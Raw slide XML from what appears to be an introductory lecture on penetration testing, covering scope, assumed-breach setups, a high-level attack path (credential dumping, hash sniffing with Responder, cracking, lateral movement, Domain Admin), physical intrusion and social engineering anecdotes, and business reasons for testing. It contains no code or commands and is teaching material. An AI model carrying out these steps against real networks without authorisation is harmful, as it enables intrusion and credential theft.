          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2199250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realtalk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-23 at 2.16.49 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-10638" b="-10638"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279561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Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>An attack on a computer system that looks for security weaknesses, usually by gaining access to that  system and the data contained within much like an illegitimate attacker would</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2490894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Test in a Pen Test?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>All of the tools which provide an offensive capability to date qualify as pen test tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Testing can include network attacks, host attacks, people attacks, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Social Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If it can be exploited it should (potentially) be tested</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>THESE SHOULD ALL CLEARLY BE DEFINED IN THE ENGAGEMENT STATEMENT OF WORK AHEAD OF TIME.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3079361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C765-B328-1540-B5C0-8A5FBAD5B5D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assumed Breach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD34F6EA-DB9E-9241-B538-8DC8A58A49FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Provide an initial entry point into your network for the pen tester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Pen tester provided device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Non-privileged user account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>VPN access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Run a penetration tester provided executable (their persistence mechanism, sometimes called a “beacon”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Why?  Save time and money, reduce risk to organization’s operations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="448194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BD14-D0A3-0841-A18C-4FA24E686819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical Attack Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208AB5E5-9D07-3648-AB26-197E41720654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Initial footprint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Dump credentials/hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Sniff for additional hashes (Responder)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Crack hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Move laterally </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Discover admin credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Take action on objective – get Domain Admin, find confidential information, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="688257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9261-692C-3549-BF73-C35EB4D37C98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physical Pen Test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2EB346C-F676-0E42-BCFA-29AE926807F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>If I can physically get into your building I can own your network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADD6F3B6-F8D0-3F4D-8154-FA3BC9954A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382809" y="4937603"/>
            <a:ext cx="5761191" cy="1920397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2532075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F12A-FA53-FA44-8EF5-F507291A0A22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physical Pen Test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0737C1D8-98D2-3944-89AE-492DC48E9071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Make sure to have your signed permission slips and get out of jail free cards!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Iowa / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>CoalFire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> pen test incident:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.darkreading.com/vulnerabilities-threats/pen-testers-who-got-arrested-doing-their-jobs-tell-all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cyberscoop.com/coalfire-security-pros-arrested-for-breaking-into-iowa-courthouse-are-still-bitter/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://arstechnica.com/information-technology/2019/11/how-a-turf-war-and-a-botched-contract-landed-2-pentesters-in-iowa-jail/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3222401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Physical Pen Test / Social Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.nbcwashington.com/news/local/Man-Posing-as-Walmart-Employee-Sends-Away-Cashier-Steals-Money-From-Register-364500471.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“A man posing as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Walmart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> employee took over a cash register at a Fairfax County store and stole money after checking out a customer, police say.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The man, who was wearing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Walmart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> employee vest, entered the store in the 13000 block of Fair Lakes Shopping Center in Fairfax, Virginia, at around 4 p.m. on Dec. 15 and told a cashier that he was needed in the office.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fairfax County Police say the man then took over the register and even checked out a customer before stealing an undisclosed amount of cash. He then left the store and drove away in a silver Honda.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1609112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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The art of getting someone to tell you something they shouldn’t.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Because it works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Because people want to be helpful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Because people would rather have chocolate than keep their password secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://nakedsecurity.sophos.com/2016/05/13/want-to-keep-your-password-safe-give-up-chocolate/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3282790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6-06-21 at 11.36.21 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-14567" b="-14567"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="162508" y="431800"/>
            <a:ext cx="8833687" cy="5565223"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2335086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S-networks-hard.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-2889" r="-2889"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-251717" y="274638"/>
            <a:ext cx="9625906" cy="6064321"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="626684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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Because it works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Because users are often the weakest link in the security chain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Because people trust too much or believe in a quick score.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3370564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do this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Defining risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Justifying investment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Testing defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Satisfying audit requirements (like PCI DSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Payment Card Industry Data Security Standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Satisfying a superior who likes buzz words</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2976863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F446-5CFD-7845-BBDC-D8DC0FE1ABEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-10-04 at 4.47.40 PM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1934E0A9-856F-C247-BF2A-578F27E344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37" r="4337"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="214313" y="-1"/>
            <a:ext cx="8672512" cy="5463683"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2016-10-04 at 4.47.48 PM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF11624F-ECF0-6549-872F-F6D897283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377" y="5463682"/>
            <a:ext cx="3492384" cy="1071527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1632089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2104-AE02-F941-9629-5B22C50C68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FBB99C-DF7F-E44A-9561-AF464B87A8F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-10-03 at 10.01.37 PM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
